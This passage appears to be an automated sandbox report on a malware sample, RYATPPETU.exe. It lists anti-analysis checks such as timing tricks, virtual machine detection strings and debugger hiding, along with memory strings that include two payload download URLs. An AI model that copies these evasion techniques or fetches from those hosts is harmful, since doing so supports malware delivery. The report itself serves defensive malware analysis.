Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000002EE9904 second address: 0000000002EE990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000002EE9B6E second address: 0000000002EE9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe TID: 6044

Thread sleep time: -32000s >= -30000s

Source: C:\Windows\SysWOW64\cmmon32.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\RYATPPETU.exe

Code function: 8_2_1E6A6A60 rdtscp

Source: C:\Users\user\Desktop\RYATPPETU.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\RYATPPETU.exe

System information queried: ModuleInformation

Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: explorer.exe, 0000000C.00000000.573441250.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 0000000C.00000000.599818995.0000000003767000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: explorer.exe, 0000000C.00000000.598586193.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin
Source: explorer.exe, 0000000C.00000000.579374066.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000000C.00000000.574488092.00000000053D7000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: RYATPPETU.exe, 00000000.00000002.405138572.0000000004BE0000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: explorer.exe, 0000000C.00000000.579374066.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: RYATPPETU.exe, 00000000.00000002.405163516.0000000004CAA000.00000004.00000001.sdmp, RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: RYATPPETU.exe, 00000008.00000002.613524536.000000000238A000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\RYATPPETU.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\RYATPPETU.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\RYATPPETU.exe

Code function: 8_2_1E6A6A60 rdtscp

Source: C:\Users\user\Desktop\RYATPPETU.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BAC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022C005C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BE1A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 0_2_022BE9B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E72B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E72B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E72FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6876E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E748ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E72FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E740EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E748F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E748B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E674F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E674F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E73131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E74070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E74070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E745BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E681B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E681B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E73138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E732073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E741074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E68B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6ABC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E744015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E744015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E731C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E74740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E7314FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E70B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E748CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6B3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6F3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E697D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E748D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E694120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E683D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E679100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E728DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E67B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6A35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E69C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E672D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RYATPPETU.exe	Code function: 8_2_1E6AA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F958EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05068D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_0501A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05013540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FD90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FA849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04F99080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050169A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050605AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050605AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FB0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050151BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FCBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 15_2_050241E8 mov eax, dword ptr fs:[00000030h]
